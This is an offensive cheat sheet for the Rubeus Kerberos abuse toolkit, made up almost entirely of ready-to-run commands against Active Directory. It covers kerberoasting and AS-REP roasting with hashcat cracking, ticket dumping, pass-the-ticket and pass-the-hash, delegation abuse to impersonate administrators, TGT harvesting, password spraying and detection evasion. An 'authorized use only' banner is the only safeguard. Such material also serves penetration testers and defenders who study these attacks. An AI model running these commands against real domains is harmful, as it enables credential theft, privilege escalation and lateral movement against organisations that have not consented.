โ† All cheat sheets

RUBEUS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Rubeus is a C# Kerberos abuse toolkit.
Essential for Kerberos attacks in Active Directory environments.

BASIC USAGE#

Rubeus.exe <command> [options]

# Help
Rubeus.exe -h
Rubeus.exe <command> /?

TICKET OPERATIONS#


    

LIST TICKETS#

# List current user tickets
Rubeus.exe triage

# List all tickets (elevated)
Rubeus.exe triage /all

# Detailed ticket dump
Rubeus.exe klist

# Dump all tickets (elevated)
Rubeus.exe dump

# Dump specific LUID
Rubeus.exe dump /luid:0x3e7

# Export to kirbi files
Rubeus.exe dump /nowrap

DESCRIBE TICKET#

# Describe kirbi file
Rubeus.exe describe /ticket:ticket.kirbi

# Describe base64 ticket
Rubeus.exe describe /ticket:BASE64_TICKET

PURGE TICKETS#

# Purge current user tickets
Rubeus.exe purge

# Purge specific LUID
Rubeus.exe purge /luid:0x3e7

KERBEROASTING#

# Kerberoast all users
Rubeus.exe kerberoast

# Kerberoast specific user
Rubeus.exe kerberoast /user:svc_account

# Output for hashcat
Rubeus.exe kerberoast /outfile:hashes.txt
Rubeus.exe kerberoast /format:hashcat

# Output for john
Rubeus.exe kerberoast /format:john

# With credentials
Rubeus.exe kerberoast /creduser:domain\user /credpassword:password

# RC4 only (faster to crack)
Rubeus.exe kerberoast /rc4opsec

# AES encryption (stealthier)
Rubeus.exe kerberoast /aes

# Specific SPN
Rubeus.exe kerberoast /spn:MSSQLSvc/sql.domain.local:1433

# Kerberoast with domain specified
Rubeus.exe kerberoast /domain:domain.local /dc:dc01.domain.local

AS-REP ROASTING#

# Find AS-REP roastable users
Rubeus.exe asreproast

# Specific user
Rubeus.exe asreproast /user:vulnuser

# Output to file
Rubeus.exe asreproast /outfile:asrep.txt

# Format for hashcat
Rubeus.exe asreproast /format:hashcat

# With DC specified
Rubeus.exe asreproast /dc:dc01.domain.local

TICKET REQUESTS#


    

TGT REQUEST#

# Request TGT with password
Rubeus.exe asktgt /user:user /password:password /domain:domain.local

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:user /rc4:NTHASH /domain:domain.local

# Request TGT with AES key
Rubeus.exe asktgt /user:user /aes256:AES_KEY /domain:domain.local

# PTT (Pass-The-Ticket) - inject into session
Rubeus.exe asktgt /user:user /password:password /ptt

# Save to file
Rubeus.exe asktgt /user:user /password:password /outfile:tgt.kirbi

# No wrap (for copy/paste)
Rubeus.exe asktgt /user:user /password:password /nowrap

# Specific encryption
Rubeus.exe asktgt /user:user /password:password /enctype:aes256

SERVICE TICKET REQUEST#

# Request service ticket
Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local

# Multiple services
Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server,http/server

# With PTT
Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local /ptt

# Alternative service name (Silver Ticket)
Rubeus.exe asktgs /ticket:TGT.kirbi /service:cifs/server.domain.local /altservice:http/server

PASS THE TICKET#

# Import ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Import base64 ticket
Rubeus.exe ptt /ticket:BASE64_TICKET

# Verify
Rubeus.exe klist

S4U ATTACKS#


    

S4U2SELF#

# Request ticket for another user to self
Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:administrator

# With service
Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target.domain.local

S4U2PROXY#

# S4U2Self then S4U2Proxy
Rubeus.exe s4u /user:svc_account$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt

# With TGT
Rubeus.exe s4u /ticket:TGT.kirbi /impersonateuser:admin /msdsspn:cifs/target /ptt

CONSTRAINED DELEGATION#

# Abuse constrained delegation
Rubeus.exe s4u /user:svc_constrained$ /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

# With alternate service
Rubeus.exe s4u /user:svc_constrained$ /rc4:HASH /impersonateuser:admin /msdsspn:time/dc /altservice:ldap /ptt

RESOURCE-BASED CONSTRAINED DELEGATION#

# After setting msDS-AllowedToActOnBehalfOfOtherIdentity
Rubeus.exe s4u /user:ATTACKER$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt

GOLDEN/SILVER TICKETS#

# Handled better by Mimikatz/ticketer.py
# But Rubeus can PTT the results

UNCONSTRAINED DELEGATION#


    

MONITOR#

# Monitor for TGTs on unconstrained host
Rubeus.exe monitor /interval:5 /filteruser:DC$

# Target specific user
Rubeus.exe monitor /targetuser:administrator /interval:5

# With nowrap for copy/paste
Rubeus.exe monitor /interval:5 /nowrap

HARVEST#

# One-time harvest
Rubeus.exe harvest /interval:5

RENEWAL#

# Renew ticket
Rubeus.exe renew /ticket:TGT.kirbi

# Renew and PTT
Rubeus.exe renew /ticket:TGT.kirbi /ptt

# Auto-renew
Rubeus.exe renew /ticket:TGT.kirbi /autorenew

PASSWORD OPERATIONS#

# Change password (requires current password)
Rubeus.exe changepw /ticket:TGT.kirbi /new:NewPassword123!

# Reset password (requires appropriate rights)
Rubeus.exe changepw /ticket:TGT.kirbi /new:NewPassword123! /targetuser:domain\targetuser

BRUTE FORCE#

# Brute force username
Rubeus.exe brute /password:Password123 /domain:domain.local

# With user list
Rubeus.exe brute /users:users.txt /password:Password123 /domain:domain.local

# Spray password
Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:domain.local

CROSS-DOMAIN#

# Request referral
Rubeus.exe asktgt /user:user /domain:domain.local /password:pass /dc:dc.domain.local /createnetonly:C:\Windows\System32\cmd.exe

# Cross-domain ticket
Rubeus.exe asktgs /ticket:TGT.kirbi /service:krbtgt/trustedforest.local /dc:dc.domain.local

MISCELLANEOUS#


    

CREATE NETONLY PROCESS#

# Create process with alternate credentials
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /show

# Then inject ticket
Rubeus.exe ptt /luid:0x... /ticket:ticket.kirbi

TICKET CACHE#

# Show ticket cache
Rubeus.exe tgtdeleg

# Obtain usable TGT via delegation trick
Rubeus.exe tgtdeleg /target:cifs/dc.domain.local

HASH EXTRACTION#

# Extract AES keys (requires admin)
Rubeus.exe hash /user:user /password:password /domain:domain.local

CURRENT USER#

# Get current user info
Rubeus.exe currentluid

EVASION#

# Use /opsec flag where available
Rubeus.exe kerberoast /opsec

# Use AES encryption
Rubeus.exe asktgt /user:user /aes256:KEY /opsec

# Avoid detections:
# - Use AES instead of RC4
# - Target specific SPNs
# - Limit concurrent requests

COMMON WORKFLOWS#


    

KERBEROAST ATTACK#

Rubeus.exe kerberoast /outfile:kerberoast.txt
hashcat -m 13100 kerberoast.txt wordlist.txt

AS-REP ROAST#

Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
hashcat -m 18200 asrep.txt wordlist.txt

PASS THE HASH (get TGT)#

Rubeus.exe asktgt /user:admin /rc4:HASH /ptt

CONSTRAINED DELEGATION#

Rubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:admin /msdsspn:cifs/target /ptt
dir \\target\c$

UNCONSTRAINED DELEGATION#

# Coerce auth (PetitPotam/PrinterBug)
# On unconstrained host:
Rubeus.exe monitor /filteruser:DC$ /interval:5 /nowrap
# Capture and use TGT

QUICK REFERENCE#

Rubeus.exe kerberoast              # Kerberoast
Rubeus.exe asreproast              # AS-REP roast
Rubeus.exe asktgt /user:x /rc4:HASH /ptt  # Request TGT
Rubeus.exe asktgs /ticket:x /service:x /ptt  # Request TGS
Rubeus.exe s4u /user:x /rc4:HASH /impersonateuser:admin /msdsspn:x /ptt  # S4U
Rubeus.exe ptt /ticket:ticket.kirbi  # Pass the ticket
Rubeus.exe dump                    # Dump all tickets
Rubeus.exe triage                  # List tickets
Rubeus.exe monitor /interval:5     # Monitor for TGTs